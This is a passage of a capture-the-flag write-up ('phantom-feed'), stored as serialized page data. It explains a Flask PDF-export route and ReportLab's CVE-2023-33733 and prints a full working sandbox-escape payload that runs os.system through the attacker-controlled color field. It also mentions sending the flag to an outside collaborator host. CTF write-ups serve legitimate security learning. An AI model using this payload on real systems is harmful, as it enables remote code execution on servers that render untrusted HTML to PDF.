",{"type":32,"tag":78,"props":4828,"children":4829},{"style":471},[4830],{"type":37,"value":624},{"type":32,"tag":78,"props":4832,"children":4833},{"style":607},[4834],{"type":37,"value":4835}," Database",{"type":32,"tag":78,"props":4837,"children":4838},{"style":471},[4839],{"type":37,"value":1170},{"type":32,"tag":78,"props":4841,"children":4842},{"class":80,"line":163},[4843,4848,4852,4856,4860,4865],{"type":32,"tag":78,"props":4844,"children":4845},{"style":607},[4846],{"type":37,"value":4847},"  orders ",{"type":32,"tag":78,"props":4849,"children":4850},{"style":471},[4851],{"type":37,"value":624},{"type":32,"tag":78,"props":4853,"children":4854},{"style":607},[4855],{"type":37,"value":629},{"type":32,"tag":78,"props":4857,"children":4858},{"style":471},[4859],{"type":37,"value":485},{"type":32,"tag":78,"props":4861,"children":4862},{"style":607},[4863],{"type":37,"value":4864},"get_all_orders",{"type":32,"tag":78,"props":4866,"children":4867},{"style":471},[4868],{"type":37,"value":1170},{"type":32,"tag":78,"props":4870,"children":4871},{"class":80,"line":172},[4872],{"type":32,"tag":78,"props":4873,"children":4874},{"style":607},[4875],{"type":37,"value":827},{"type":32,"tag":78,"props":4877,"children":4878},{"class":80,"line":181},[4879,4883,4887,4892],{"type":32,"tag":78,"props":4880,"children":4881},{"style":833},[4882],{"type":37,"value":4759},{"type":32,"tag":78,"props":4884,"children":4885},{"style":569},[4886],{"type":37,"value":4764},{"type":32,"tag":78,"props":4888,"children":4889},{"style":607},[4890],{"type":37,"value":4891}," orders",{"type":32,"tag":78,"props":4893,"children":4894},{"style":471},[4895],{"type":37,"value":1545},{"type":32,"tag":78,"props":4897,"children":4898},{"class":80,"line":190},[4899,4903,4907,4911,4915,4920,4924,4928],{"type":32,"tag":78,"props":4900,"children":4901},{"style":833},[4902],{"type":37,"value":1178},{"type":32,"tag":78,"props":4904,"children":4905},{"style":607},[4906],{"type":37,"value":4785},{"type":32,"tag":78,"props":4908,"children":4909},{"style":471},[4910],{"type":37,"value":495},{"type":32,"tag":78,"props":4912,"children":4913},{"style":498},[4914],{"type":37,"value":501},{"type":32,"tag":78,"props":4916,"children":4917},{"style":504},[4918],{"type":37,"value":4919},"No orders placed",{"type":32,"tag":78,"props":4921,"children":4922},{"style":498},[4923],{"type":37,"value":501},{"type":32,"tag":78,"props":4925,"children":4926},{"style":471},[4927],{"type":37,"value":915},{"type":32,"tag":78,"props":4929,"children":4930},{"style":918},[4931],{"type":37,"value":921},{"type":32,"tag":78,"props":4933,"children":4934},{"class":80,"line":199},[4935],{"type":32,"tag":78,"props":4936,"children":4937},{"emptyLinePlaceholder":157},[4938],{"type":37,"value":160},{"type":32,"tag":78,"props":4940,"children":4941},{"class":80,"line":207},[4942,4947,4951,4955,4959,4963,4968,4972,4976,4980,4984,4988],{"type":32,"tag":78,"props":4943,"children":4944},{"style":607},[4945],{"type":37,"value":4946},"  orders_template ",{"type":32,"tag":78,"props":4948,"children":4949},{"style":471},[4950],{"type":37,"value":624},{"type":32,"tag":78,"props":4952,"children":4953},{"style":607},[4954],{"type":37,"value":841},{"type":32,"tag":78,"props":4956,"children":4957},{"style":471},[4958],{"type":37,"value":495},{"type":32,"tag":78,"props":4960,"children":4961},{"style":498},[4962],{"type":37,"value":501},{"type":32,"tag":78,"props":4964,"children":4965},{"style":504},[4966],{"type":37,"value":4967},"orders.html",{"type":32,"tag":78,"props":4969,"children":4970},{"style":498},[4971],{"type":37,"value":501},{"type":32,"tag":78,"props":4973,"children":4974},{"style":471},[4975],{"type":37,"value":516},{"type":32,"tag":78,"props":4977,"children":4978},{"style":519},[4979],{"type":37,"value":4769},{"type":32,"tag":78,"props":4981,"children":4982},{"style":471},[4983],{"type":37,"value":624},{"type":32,"tag":78,"props":4985,"children":4986},{"style":607},[4987],{"type":37,"value":4736},{"type":32,"tag":78,"props":4989,"children":4990},{"style":471},[4991],{"type":37,"value":722},{"type":32,"tag":78,"props":4993,"children":4994},{"class":80,"line":215},[4995],{"type":32,"tag":78,"props":4996,"children":4997},{"style":607},[4998],{"type":37,"value":827},{"type":32,"tag":78,"props":5000,"children":5001},{"class":80,"line":224},[5002,5007,5011,5016],{"type":32,"tag":78,"props":5003,"children":5004},{"style":607},[5005],{"type":37,"value":5006},"  html2pdf ",{"type":32,"tag":78,"props":5008,"children":5009},{"style":471},[5010],{"type":37,"value":624},{"type":32,"tag":78,"props":5012,"children":5013},{"style":607},[5014],{"type":37,"value":5015}," HTML2PDF",{"type":32,"tag":78,"props":5017,"children":5018},{"style":471},[5019],{"type":37,"value":1170},{"type":32,"tag":78,"props":5021,"children":5022},{"class":80,"line":233},[5023,5028,5032,5037,5041,5046,5050,5055,5059,5063],{"type":32,"tag":78,"props":5024,"children":5025},{"style":607},[5026],{"type":37,"value":5027},"  pdf ",{"type":32,"tag":78,"props":5029,"children":5030},{"style":471},[5031],{"type":37,"value":624},{"type":32,"tag":78,"props":5033,"children":5034},{"style":607},[5035],{"type":37,"value":5036}," html2pdf",{"type":32,"tag":78,"props":5038,"children":5039},{"style":471},[5040],{"type":37,"value":485},{"type":32,"tag":78,"props":5042,"children":5043},{"style":607},[5044],{"type":37,"value":5045},"convert",{"type":32,"tag":78,"props":5047,"children":5048},{"style":471},[5049],{"type":37,"value":495},{"type":32,"tag":78,"props":5051,"children":5052},{"style":607},[5053],{"type":37,"value":5054},"orders_template",{"type":32,"tag":78,"props":5056,"children":5057},{"style":471},[5058],{"type":37,"value":516},{"type":32,"tag":78,"props":5060,"children":5061},{"style":607},[5062],{"type":37,"value":4891},{"type":32,"tag":78,"props":5064,"children":5065},{"style":471},[5066],{"type":37,"value":722},{"type":32,"tag":78,"props":5068,"children":5069},{"class":80,"line":241},[5070],{"type":32,"tag":78,"props":5071,"children":5072},{"style":607},[5073],{"type":37,"value":827},{"type":32,"tag":78,"props":5075,"children":5076},{"class":80,"line":250},[5077,5082,5086,5091,5095,5100],{"type":32,"tag":78,"props":5078,"children":5079},{"style":607},[5080],{"type":37,"value":5081},"  pdf",{"type":32,"tag":78,"props":5083,"children":5084},{"style":471},[5085],{"type":37,"value":485},{"type":32,"tag":78,"props":5087,"children":5088},{"style":607},[5089],{"type":37,"value":5090},"seek",{"type":32,"tag":78,"props":5092,"children":5093},{"style":471},[5094],{"type":37,"value":495},{"type":32,"tag":78,"props":5096,"children":5097},{"style":918},[5098],{"type":37,"value":5099},"0",{"type":32,"tag":78,"props":5101,"children":5102},{"style":471},[5103],{"type":37,"value":722},{"type":32,"tag":78,"props":5105,"children":5106},{"class":80,"line":3011},[5107,5111,5116,5120,5125,5129,5134,5138,5142,5146,5151,5155,5159,5164,5168,5172,5177,5181,5185,5190,5194],{"type":32,"tag":78,"props":5108,"children":5109},{"style":833},[5110],{"type":37,"value":836},{"type":32,"tag":78,"props":5112,"children":5113},{"style":607},[5114],{"type":37,"value":5115}," send_file",{"type":32,"tag":78,"props":5117,"children":5118},{"style":471},[5119],{"type":37,"value":495},{"type":32,"tag":78,"props":5121,"children":5122},{"style":607},[5123],{"type":37,"value":5124},"pdf",{"type":32,"tag":78,"props":5126,"children":5127},{"style":471},[5128],{"type":37,"value":516},{"type":32,"tag":78,"props":5130,"children":5131},{"style":519},[5132],{"type":37,"value":5133}," as_attachment",{"type":32,"tag":78,"props":5135,"children":5136},{"style":471},[5137],{"type":37,"value":624},{"type":32,"tag":78,"props":5139,"children":5140},{"style":833},[5141],{"type":37,"value":1297},{"type":32,"tag":78,"props":5143,"children":5144},{"style":471},[5145],{"type":37,"value":516},{"type":32,"tag":78,"props":5147,"children":5148},{"style":519},[5149],{"type":37,"value":5150}," download_name",{"type":32,"tag":78,"props":5152,"children":5153},{"style":471},[5154],{"type":37,"value":624},{"type":32,"tag":78,"props":5156,"children":5157},{"style":498},[5158],{"type":37,"value":501},{"type":32,"tag":78,"props":5160,"children":5161},{"style":504},[5162],{"type":37,"value":5163},"orders.pdf",{"type":32,"tag":78,"props":5165,"children":5166},{"style":498},[5167],{"type":37,"value":501},{"type":32,"tag":78,"props":5169,"children":5170},{"style":471},[5171],{"type":37,"value":516},{"type":32,"tag":78,"props":5173,"children":5174},{"style":519},[5175],{"type":37,"value":5176}," mimetype",{"type":32,"tag":78,"props":5178,"children":5179},{"style":471},[5180],{"type":37,"value":624},{"type":32,"tag":78,"props":5182,"children":5183},{"style":498},[5184],{"type":37,"value":501},{"type":32,"tag":78,"props":5186,"children":5187},{"style":504},[5188],{"type":37,"value":5189},"application/pdf",{"type":32,"tag":78,"props":5191,"children":5192},{"style":498},[5193],{"type":37,"value":501},{"type":32,"tag":78,"props":5195,"children":5196},{"style":471},[5197],{"type":37,"value":722},{"type":32,"tag":46,"props":5199,"children":5200},{},[5201,5203,5208,5210,5216],{"type":37,"value":5202},"This route is responsible for generating a PDF document of all orders, with a specified color, and sending it as a downloadable file in the response to a POST request at the ",{"type":32,"tag":74,"props":5204,"children":5206},{"className":5205},[],[5207],{"type":37,"value":4625},{"type":37,"value":5209}," route. It uses the ",{"type":32,"tag":74,"props":5211,"children":5213},{"className":5212},[],[5214],{"type":37,"value":5215},"render_template",{"type":37,"value":5217}," function to render the orders.html template, which is then converted to a PDF using the HTML2PDF class.",{"type":32,"tag":46,"props":5219,"children":5220},{},[5221,5223,5228],{"type":37,"value":5222},"You can find below the ",{"type":32,"tag":74,"props":5224,"children":5226},{"className":5225},[],[5227],{"type":37,"value":4967},{"type":37,"value":5229}," template:",{"type":32,"tag":63,"props":5231,"children":5232},{"lang":3279},[5233],{"type":32,"tag":68,"props":5234,"children":5236},{"className":3283,"code":5235,"language":3279,"meta":7,"style":7},"\u003C!-- orders.html  -->\n\u003Cpara>\n    \u003Cfont color=\"{{ color }}\">\n        Orders:\n    \u003C/font>\n\u003C/para>\n",[5237],{"type":32,"tag":74,"props":5238,"children":5239},{"__ignoreMap":7},[5240,5248,5265,5304,5312,5328],{"type":32,"tag":78,"props":5241,"children":5242},{"class":80,"line":81},[5243],{"type":32,"tag":78,"props":5244,"children":5245},{"style":673},[5246],{"type":37,"value":5247},"\u003C!-- orders.html  -->\n",{"type":32,"tag":78,"props":5249,"children":5250},{"class":80,"line":90},[5251,5255,5261],{"type":32,"tag":78,"props":5252,"children":5253},{"style":471},[5254],{"type":37,"value":3296},{"type":32,"tag":78,"props":5256,"children":5258},{"style":5257},"--shiki-default:#FDAEB7",[5259],{"type":37,"value":5260},"para",{"type":32,"tag":78,"props":5262,"children":5263},{"style":471},[5264],{"type":37,"value":3371},{"type":32,"tag":78,"props":5266,"children":5267},{"class":80,"line":99},[5268,5273,5279,5283,5287,5291,5296,5300],{"type":32,"tag":78,"props":5269,"children":5270},{"style":471},[5271],{"type":37,"value":5272},"    \u003C",{"type":32,"tag":78,"props":5274,"children":5276},{"style":5275},"--shiki-default:#FDAEB7;--shiki-default-font-style:italic",[5277],{"type":37,"value":5278},"font",{"type":32,"tag":78,"props":5280,"children":5281},{"style":519},[5282],{"type":37,"value":4769},{"type":32,"tag":78,"props":5284,"children":5285},{"style":471},[5286],{"type":37,"value":624},{"type":32,"tag":78,"props":5288,"children":5289},{"style":498},[5290],{"type":37,"value":501},{"type":32,"tag":78,"props":5292,"children":5293},{"style":504},[5294],{"type":37,"value":5295},"{{ color }}",{"type":32,"tag":78,"props":5297,"children":5298},{"style":498},[5299],{"type":37,"value":501},{"type":32,"tag":78,"props":5301,"children":5302},{"style":471},[5303],{"type":37,"value":3371},{"type":32,"tag":78,"props":5305,"children":5306},{"class":80,"line":108},[5307],{"type":32,"tag":78,"props":5308,"children":5309},{"style":607},[5310],{"type":37,"value":5311},"        Orders:\n",{"type":32,"tag":78,"props":5313,"children":5314},{"class":80,"line":117},[5315,5320,5324],{"type":32,"tag":78,"props":5316,"children":5317},{"style":471},[5318],{"type":37,"value":5319},"    \u003C/",{"type":32,"tag":78,"props":5321,"children":5322},{"style":5275},[5323],{"type":37,"value":5278},{"type":32,"tag":78,"props":5325,"children":5326},{"style":471},[5327],{"type":37,"value":3371},{"type":32,"tag":78,"props":5329,"children":5330},{"class":80,"line":126},[5331,5336,5340],{"type":32,"tag":78,"props":5332,"children":5333},{"style":471},[5334],{"type":37,"value":5335},"\u003C/",{"type":32,"tag":78,"props":5337,"children":5338},{"style":5257},[5339],{"type":37,"value":5260},{"type":32,"tag":78,"props":5341,"children":5342},{"style":471},[5343],{"type":37,"value":3371},{"type":32,"tag":46,"props":5345,"children":5346},{},[5347],{"type":37,"value":5348},"The class HTML2PDF is responsible for converting the HTML template to a PDF document. It uses the reportlab library to do this.",{"type":32,"tag":46,"props":5350,"children":5351},{},[5352],{"type":37,"value":5353},"Reportlab is an open-source project that allows generating PDF documents using the Python programming language. It supports the creation of graphics and data charts from various bitmap and vector formats, in addition to PDF.",{"type":32,"tag":63,"props":5355,"children":5356},{"lang":456},[5357],{"type":32,"tag":68,"props":5358,"children":5360},{"className":460,"code":5359,"language":456,"meta":7,"style":7},"from reportlab.platypus import SimpleDocTemplate, Paragraph, Table, TableStyle\nfrom reportlab.lib.pagesizes import letter\nfrom reportlab.lib import colors\nfrom io import BytesIO\n\nclass HTML2PDF():\n    def __init__(self):\n        self.stream_file = BytesIO()\n        self.content = []\n\n[...]\n\n    def convert(self, html, data):\n        doc = self.get_document_template(self.stream_file)\n        self.add_paragraph(html)\n        self.add_table(data)\n        self.build_document(doc, self.content)\n        return self.stream_file\n",[5361],{"type":32,"tag":74,"props":5362,"children":5363},{"__ignoreMap":7},[5364,5422,5460,5489,5510,5517,5532,5555,5585,5610,5617,5632,5639,5681,5727,5755,5784,5830],{"type":32,"tag":78,"props":5365,"children":5366},{"class":80,"line":81},[5367,5372,5377,5381,5386,5390,5395,5399,5404,5408,5413,5417],{"type":32,"tag":78,"props":5368,"children":5369},{"style":833},[5370],{"type":37,"value":5371},"from",{"type":32,"tag":78,"props":5373,"children":5374},{"style":607},[5375],{"type":37,"value":5376}," reportlab",{"type":32,"tag":78,"props":5378,"children":5379},{"style":471},[5380],{"type":37,"value":485},{"type":32,"tag":78,"props":5382,"children":5383},{"style":607},[5384],{"type":37,"value":5385},"platypus ",{"type":32,"tag":78,"props":5387,"children":5388},{"style":833},[5389],{"type":37,"value":1947},{"type":32,"tag":78,"props":5391,"children":5392},{"style":607},[5393],{"type":37,"value":5394}," SimpleDocTemplate",{"type":32,"tag":78,"props":5396,"children":5397},{"style":471},[5398],{"type":37,"value":516},{"type":32,"tag":78,"props":5400,"children":5401},{"style":607},[5402],{"type":37,"value":5403}," Paragraph",{"type":32,"tag":78,"props":5405,"children":5406},{"style":471},[5407],{"type":37,"value":516},{"type":32,"tag":78,"props":5409,"children":5410},{"style":607},[5411],{"type":37,"value":5412}," Table",{"type":32,"tag":78,"props":5414,"children":5415},{"style":471},[5416],{"type":37,"value":516},{"type":32,"tag":78,"props":5418,"children":5419},{"style":607},[5420],{"type":37,"value":5421}," TableStyle\n",{"type":32,"tag":78,"props":5423,"children":5424},{"class":80,"line":90},[5425,5429,5433,5437,5442,5446,5451,5455],{"type":32,"tag":78,"props":5426,"children":5427},{"style":833},[5428],{"type":37,"value":5371},{"type":32,"tag":78,"props":5430,"children":5431},{"style":607},[5432],{"type":37,"value":5376},{"type":32,"tag":78,"props":5434,"children":5435},{"style":471},[5436],{"type":37,"value":485},{"type":32,"tag":78,"props":5438,"children":5439},{"style":607},[5440],{"type":37,"value":5441},"lib",{"type":32,"tag":78,"props":5443,"children":5444},{"style":471},[5445],{"type":37,"value":485},{"type":32,"tag":78,"props":5447,"children":5448},{"style":607},[5449],{"type":37,"value":5450},"pagesizes ",{"type":32,"tag":78,"props":5452,"children":5453},{"style":833},[5454],{"type":37,"value":1947},{"type":32,"tag":78,"props":5456,"children":5457},{"style":607},[5458],{"type":37,"value":5459}," letter\n",{"type":32,"tag":78,"props":5461,"children":5462},{"class":80,"line":99},[5463,5467,5471,5475,5480,5484],{"type":32,"tag":78,"props":5464,"children":5465},{"style":833},[5466],{"type":37,"value":5371},{"type":32,"tag":78,"props":5468,"children":5469},{"style":607},[5470],{"type":37,"value":5376},{"type":32,"tag":78,"props":5472,"children":5473},{"style":471},[5474],{"type":37,"value":485},{"type":32,"tag":78,"props":5476,"children":5477},{"style":607},[5478],{"type":37,"value":5479},"lib ",{"type":32,"tag":78,"props":5481,"children":5482},{"style":833},[5483],{"type":37,"value":1947},{"type":32,"tag":78,"props":5485,"children":5486},{"style":607},[5487],{"type":37,"value":5488}," colors\n",{"type":32,"tag":78,"props":5490,"children":5491},{"class":80,"line":108},[5492,5496,5501,5505],{"type":32,"tag":78,"props":5493,"children":5494},{"style":833},[5495],{"type":37,"value":5371},{"type":32,"tag":78,"props":5497,"children":5498},{"style":607},[5499],{"type":37,"value":5500}," io ",{"type":32,"tag":78,"props":5502,"children":5503},{"style":833},[5504],{"type":37,"value":1947},{"type":32,"tag":78,"props":5506,"children":5507},{"style":607},[5508],{"type":37,"value":5509}," BytesIO\n",{"type":32,"tag":78,"props":5511,"children":5512},{"class":80,"line":117},[5513],{"type":32,"tag":78,"props":5514,"children":5515},{"emptyLinePlaceholder":157},[5516],{"type":37,"value":160},{"type":32,"tag":78,"props":5518,"children":5519},{"class":80,"line":126},[5520,5524,5528],{"type":32,"tag":78,"props":5521,"children":5522},{"style":569},[5523],{"type":37,"value":1206},{"type":32,"tag":78,"props":5525,"children":5526},{"style":1209},[5527],{"type":37,"value":5015},{"type":32,"tag":78,"props":5529,"children":5530},{"style":471},[5531],{"type":37,"value":582},{"type":32,"tag":78,"props":5533,"children":5534},{"class":80,"line":135},[5535,5539,5543,5547,5551],{"type":32,"tag":78,"props":5536,"children":5537},{"style":569},[5538],{"type":37,"value":1553},{"type":32,"tag":78,"props":5540,"children":5541},{"style":1257},[5542],{"type":37,"value":1558},{"type":32,"tag":78,"props":5544,"children":5545},{"style":471},[5546],{"type":37,"value":495},{"type":32,"tag":78,"props":5548,"children":5549},{"style":607},[5550],{"type":37,"value":952},{"type":32,"tag":78,"props":5552,"children":5553},{"style":471},[5554],{"type":37,"value":966},{"type":32,"tag":78,"props":5556,"children":5557},{"class":80,"line":144},[5558,5563,5567,5572,5576,5581],{"type":32,"tag":78,"props":5559,"children":5560},{"style":593},[5561],{"type":37,"value":5562},"        self",{"type":32,"tag":78,"props":5564,"children":5565},{"style":471},[5566],{"type":37,"value":485},{"type":32,"tag":78,"props":5568,"children":5569},{"style":607},[5570],{"type":37,"value":5571},"stream_file ",{"type":32,"tag":78,"props":5573,"children":5574},{"style":471},[5575],{"type":37,"value":624},{"type":32,"tag":78,"props":5577,"children":5578},{"style":607},[5579],{"type":37,"value":5580}," BytesIO",{"type":32,"tag":78,"props":5582,"children":5583},{"style":471},[5584],{"type":37,"value":1170},{"type":32,"tag":78,"props":5586,"children":5587},{"class":80,"line":153},[5588,5592,5596,5601,5605],{"type":32,"tag":78,"props":5589,"children":5590},{"style":593},[5591],{"type":37,"value":5562},{"type":32,"tag":78,"props":5593,"children":5594},{"style":471},[5595],{"type":37,"value":485},{"type":32,"tag":78,"props":5597,"children":5598},{"style":607},[5599],{"type":37,"value":5600},"content ",{"type":32,"tag":78,"props":5602,"children":5603},{"style":471},[5604],{"type":37,"value":624},{"type":32,"tag":78,"props":5606,"children":5607},{"style":471},[5608],{"type":37,"value":5609}," []\n",{"type":32,"tag":78,"props":5611,"children":5612},{"class":80,"line":163},[5613],{"type":32,"tag":78,"props":5614,"children":5615},{"emptyLinePlaceholder":157},[5616],{"type":37,"value":160},{"type":32,"tag":78,"props":5618,"children":5619},{"class":80,"line":172},[5620,5624,5628],{"type":32,"tag":78,"props":5621,"children":5622},{"style":471},[5623],{"type":37,"value":1626},{"type":32,"tag":78,"props":5625,"children":5626},{"style":593},[5627],{"type":37,"value":596},{"type":32,"tag":78,"props":5629,"children":5630},{"style":471},[5631],{"type":37,"value":601},{"type":32,"tag":78,"props":5633,"children":5634},{"class":80,"line":181},[5635],{"type":32,"tag":78,"props":5636,"children":5637},{"emptyLinePlaceholder":157},[5638],{"type":37,"value":160},{"type":32,"tag":78,"props":5640,"children":5641},{"class":80,"line":190},[5642,5646,5651,5655,5659,5663,5668,5672,5677],{"type":32,"tag":78,"props":5643,"children":5644},{"style":569},[5645],{"type":37,"value":1553},{"type":32,"tag":78,"props":5647,"children":5648},{"style":477},[5649],{"type":37,"value":5650}," convert",{"type":32,"tag":78,"props":5652,"children":5653},{"style":471},[5654],{"type":37,"value":495},{"type":32,"tag":78,"props":5656,"children":5657},{"style":607},[5658],{"type":37,"value":952},{"type":32,"tag":78,"props":5660,"children":5661},{"style":471},[5662],{"type":37,"value":516},{"type":32,"tag":78,"props":5664,"children":5665},{"style":607},[5666],{"type":37,"value":5667}," html",{"type":32,"tag":78,"props":5669,"children":5670},{"style":471},[5671],{"type":37,"value":516},{"type":32,"tag":78,"props":5673,"children":5674},{"style":607},[5675],{"type":37,"value":5676}," data",{"type":32,"tag":78,"props":5678,"children":5679},{"style":471},[5680],{"type":37,"value":966},{"type":32,"tag":78,"props":5682,"children":5683},{"class":80,"line":199},[5684,5689,5693,5697,5701,5706,5710,5714,5718,5723],{"type":32,"tag":78,"props":5685,"children":5686},{"style":607},[5687],{"type":37,"value":5688},"        doc ",{"type":32,"tag":78,"props":5690,"children":5691},{"style":471},[5692],{"type":37,"value":624},{"type":32,"tag":78,"props":5694,"children":5695},{"style":593},[5696],{"type":37,"value":1596},{"type":32,"tag":78,"props":5698,"children":5699},{"style":471},[5700],{"type":37,"value":485},{"type":32,"tag":78,"props":5702,"children":5703},{"style":607},[5704],{"type":37,"value":5705},"get_document_template",{"type":32,"tag":78,"props":5707,"children":5708},{"style":471},[5709],{"type":37,"value":495},{"type":32,"tag":78,"props":5711,"children":5712},{"style":593},[5713],{"type":37,"value":952},{"type":32,"tag":78,"props":5715,"children":5716},{"style":471},[5717],{"type":37,"value":485},{"type":32,"tag":78,"props":5719,"children":5720},{"style":607},[5721],{"type":37,"value":5722},"stream_file",{"type":32,"tag":78,"props":5724,"children":5725},{"style":471},[5726],{"type":37,"value":722},{"type":32,"tag":78,"props":5728,"children":5729},{"class":80,"line":207},[5730,5734,5738,5743,5747,5751],{"type":32,"tag":78,"props":5731,"children":5732},{"style":593},[5733],{"type":37,"value":5562},{"type":32,"tag":78,"props":5735,"children":5736},{"style":471},[5737],{"type":37,"value":485},{"type":32,"tag":78,"props":5739,"children":5740},{"style":607},[5741],{"type":37,"value":5742},"add_paragraph",{"type":32,"tag":78,"props":5744,"children":5745},{"style":471},[5746],{"type":37,"value":495},{"type":32,"tag":78,"props":5748,"children":5749},{"style":607},[5750],{"type":37,"value":3279},{"type":32,"tag":78,"props":5752,"children":5753},{"style":471},[5754],{"type":37,"value":722},{"type":32,"tag":78,"props":5756,"children":5757},{"class":80,"line":215},[5758,5762,5766,5771,5775,5780],{"type":32,"tag":78,"props":5759,"children":5760},{"style":593},[5761],{"type":37,"value":5562},{"type":32,"tag":78,"props":5763,"children":5764},{"style":471},[5765],{"type":37,"value":485},{"type":32,"tag":78,"props":5767,"children":5768},{"style":607},[5769],{"type":37,"value":5770},"add_table",{"type":32,"tag":78,"props":5772,"children":5773},{"style":471},[5774],{"type":37,"value":495},{"type":32,"tag":78,"props":5776,"children":5777},{"style":607},[5778],{"type":37,"value":5779},"data",{"type":32,"tag":78,"props":5781,"children":5782},{"style":471},[5783],{"type":37,"value":722},{"type":32,"tag":78,"props":5785,"children":5786},{"class":80,"line":224},[5787,5791,5795,5800,5804,5809,5813,5817,5821,5826],{"type":32,"tag":78,"props":5788,"children":5789},{"style":593},[5790],{"type":37,"value":5562},{"type":32,"tag":78,"props":5792,"children":5793},{"style":471},[5794],{"type":37,"value":485},{"type":32,"tag":78,"props":5796,"children":5797},{"style":607},[5798],{"type":37,"value":5799},"build_document",{"type":32,"tag":78,"props":5801,"children":5802},{"style":471},[5803],{"type":37,"value":495},{"type":32,"tag":78,"props":5805,"children":5806},{"style":607},[5807],{"type":37,"value":5808},"doc",{"type":32,"tag":78,"props":5810,"children":5811},{"style":471},[5812],{"type":37,"value":516},{"type":32,"tag":78,"props":5814,"children":5815},{"style":593},[5816],{"type":37,"value":1596},{"type":32,"tag":78,"props":5818,"children":5819},{"style":471},[5820],{"type":37,"value":485},{"type":32,"tag":78,"props":5822,"children":5823},{"style":607},[5824],{"type":37,"value":5825},"content",{"type":32,"tag":78,"props":5827,"children":5828},{"style":471},[5829],{"type":37,"value":722},{"type":32,"tag":78,"props":5831,"children":5832},{"class":80,"line":233},[5833,5838,5842,5846],{"type":32,"tag":78,"props":5834,"children":5835},{"style":833},[5836],{"type":37,"value":5837},"        return",{"type":32,"tag":78,"props":5839,"children":5840},{"style":593},[5841],{"type":37,"value":1596},{"type":32,"tag":78,"props":5843,"children":5844},{"style":471},[5845],{"type":37,"value":485},{"type":32,"tag":78,"props":5847,"children":5848},{"style":607},[5849],{"type":37,"value":5850},"stream_file\n",{"type":32,"tag":46,"props":5852,"children":5853},{},[5854,5856,5862],{"type":37,"value":5855},"This library is known to be vulnerable to RCE attacks. The vulnerability is present due to inadequate validations within the ",{"type":32,"tag":74,"props":5857,"children":5859},{"className":5858},[],[5860],{"type":37,"value":5861},"rl_safe_eval",{"type":37,"value":5863}," function, attackers have the ability to insert malicious code into an HTML document, which will then be converted into a PDF using software that relies on the ReportLab library. To exploit this vulnerability, the entire malicious code must be activated through eval within a single expression. This vulnerability is referenced as CVE-2023-33733.",{"type":32,"tag":46,"props":5865,"children":5866},{},[5867,5869,5876],{"type":37,"value":5868},"For more details, ",{"type":32,"tag":408,"props":5870,"children":5873},{":target":410,"href":5871,"rel":5872},"https://github.com/c53elyas/CVE-2023-33733",[413],[5874],{"type":37,"value":5875},"the article of c53elyas",{"type":37,"value":5877}," explains the vulnerability in depth.",{"type":32,"tag":46,"props":5879,"children":5880},{},[5881],{"type":32,"tag":3077,"props":5882,"children":5883},{},[5884],{"type":37,"value":5885},"It is important to note that this exploit is only possible if the application allow hostile input to be passed into colors. This is exactly our case, as we control the variable color that is used in the render_template function.",{"type":32,"tag":46,"props":5887,"children":5888},{},[5889],{"type":37,"value":5890},"The payload that will be executed to exploit the RCE during our final exploit is as follows:",{"type":32,"tag":63,"props":5892,"children":5894},{"lang":5893},"txt",[5895],{"type":32,"tag":68,"props":5896,"children":5899},{"className":5897,"code":5898,"language":5893,"meta":7,"style":7},"language-txt shiki shiki-themes vitesse-dark","[[[getattr(pow, Word('__globals__'))['os'].system('echo pwned') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated \u003C 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'\n",[5900],{"type":32,"tag":74,"props":5901,"children":5902},{"__ignoreMap":7},[5903],{"type":32,"tag":78,"props":5904,"children":5905},{"class":80,"line":81},[5906],{"type":32,"tag":78,"props":5907,"children":5908},{},[5909],{"type":37,"value":5898},{"type":32,"tag":46,"props":5911,"children":5912},{},[5913],{"type":37,"value":5914},"There is the final request that will allow us to exploit the vulnerability:",{"type":32,"tag":52,"props":5916,"children":5918},{"imgSrc":5917},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322788/writeups/phantom-feed/last_request.webp",[],{"type":32,"tag":46,"props":5920,"children":5921},{},[5922],{"type":37,"value":5923},"We can see the flag sent successfuly to our collaborator:",{"type":32,"tag":52,"props":5925,"children":5927},{"imgSrc":5926},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704322779/writeups/phantom-feed/flag_collaborator.webp",[],{"type":32,"tag":5929,"props":5930,"children":5931},"style",{},[5932],{"type":37,"value":5933},"html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}",{"title":7,"searchDepth":90,"depth":81,"links":5935},[5936,5937,5938,5939,5940],{"id":41,"depth":90,"text":44},{"id":382,"depth":90,"text":385},{"id":2329,"depth":90,"text":2332},{"id":3037,"depth":90,"text":3040},{"id":4575,"depth":90,"text":4578},"markdown","content:writeups:phantom-feed.md","writeups/phantom-feed.md","writeups/phantom-feed","md",1749027224526]